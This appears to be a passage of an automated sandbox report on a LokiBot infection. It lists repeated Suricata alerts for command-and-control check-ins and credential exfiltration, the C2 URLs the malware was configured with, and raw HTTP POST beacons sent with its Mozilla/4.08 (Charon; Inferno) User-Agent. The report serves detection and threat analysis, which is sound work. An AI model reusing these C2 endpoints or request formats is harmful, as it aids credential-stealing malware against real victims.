                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49748 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49741 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49756 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49756 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49749 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49749 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49753 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49753 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49730 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49730 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49753 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49753 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49749 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49749 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49751 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49751 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49726 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49726 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49751 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49751 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49732 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49726 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49742 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49734 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49734 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49742 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49732 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49734 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49734 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49757 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49757 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49746 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49746 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49767 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49767 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49737 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49737 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49716 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49716 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49761 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49761 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49737 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49737 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49767 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49767 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49733 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49733 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49746 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49746 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49765 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49765 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49733 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49733 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49735 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49761 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49759 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49756 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49757 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49757 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49761 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49756 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49735 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49732 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49732 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49759 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49735 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49735 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49728 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49728 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49750 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49741 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49729 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49729 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49728 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49728 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49765 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49765 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49741 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49741 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49729 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49729 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49726 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49752 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49727 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49727 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49759 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49740 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49752 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49755 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49743 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49743 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49740 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49743 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49755 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49743 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49752 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49752 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49738 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49738 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49764 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49764 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49750 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49745 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49745 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49759 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49738 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49738 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49744 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49744 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49754 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49760 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49760 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49744 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49754 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49744 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49713 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49764 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49764 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49713 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49760 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49755 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49715 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49715 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49760 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49713 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49740 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49715 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49715 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49740 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49754 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49725 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49754 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49750 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49750 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49755 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49725 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49725 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49745 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49725 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49745 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49736 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49736 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49762 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49762 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49736 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49736 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49747 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49747 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49758 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49758 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49758 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49758 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49747 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49747 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49762 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49762 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49763 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49763 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49763 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49763 -> 104.248.205.66:80
                        Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                        Source: Malware configuration extractorURLs: http://104.248.205.66/index.php/17008709
                        Source: Joe Sandbox ViewIP Address: 104.248.205.66 104.248.205.66
                        Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
